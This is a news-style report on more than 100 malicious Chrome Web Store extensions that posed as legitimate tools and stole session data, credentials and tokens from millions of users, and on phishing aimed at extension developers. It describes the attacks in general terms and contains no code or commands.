How cybercriminals are exploiting the Chrome Web Store has become alarmingly clear, as security researchers have revealed more than 100 malicious extensions since February 2024 that have collectively compromised over 2.6 million users.
The fraudulent extensions, masquerading as legitimate tools from Fortinet, VPN providers, and YouTube utilities, have successfully deceived users by appearing on the official Chrome Web Store during harboring malicious code designed to steal sensitive data. These malicious browser tools primarily focus on session hijacking attacks.
These sophisticated attacks utilize multiple deception tactics, including the creation of convincing replica websites that mimic legitimate services. The attackers employed a consent phishing strategy to manipulate users into granting dangerous permissions through OAuth flows. While protection tools like AI-powered detection can help identify these threats, many users remain vulnerable without proper security measures.
Once installed, the malicious extensions exploit excessive permissions granted through manifest files to access users’ browser activities, credentials, and session data. Some extensions establish WebSocket connections to route traffic through attacker-controlled infrastructure, enabling continuous monitoring and data theft.
The scope of the problem extends beyond individual users to affect legitimate developers themselves.
Attackers have launched targeted phishing campaigns against extension developers, sending fraudulent emails that appear to come from the Chrome Web Store. These communications typically threaten extension removal if immediate action is taken, successfully tricking developers into providing access credentials that allow attackers to upload malicious updates to otherwise trusted extensions.
The technical sophistication of these attacks is particularly concerning, as the malicious extensions employ various methods to evade detection.
Attackers utilize “onreset” event handlers and temporary DOM elements for code execution, whereas some extensions fetch and execute arbitrary scripts from remote servers. The compromises have persisted undetected for up to 18 months in some cases, targeting specific user bases such as banking customers and cryptocurrency users.
The impact of these attacks has been substantial, with a single campaign affecting 33 unique extensions and potentially exposing millions of users’ sensitive information, including banking credentials and enterprise access tokens.
The ability of attackers to push malicious updates through official channels has made even cautious users vulnerable to these sophisticated deception campaigns.
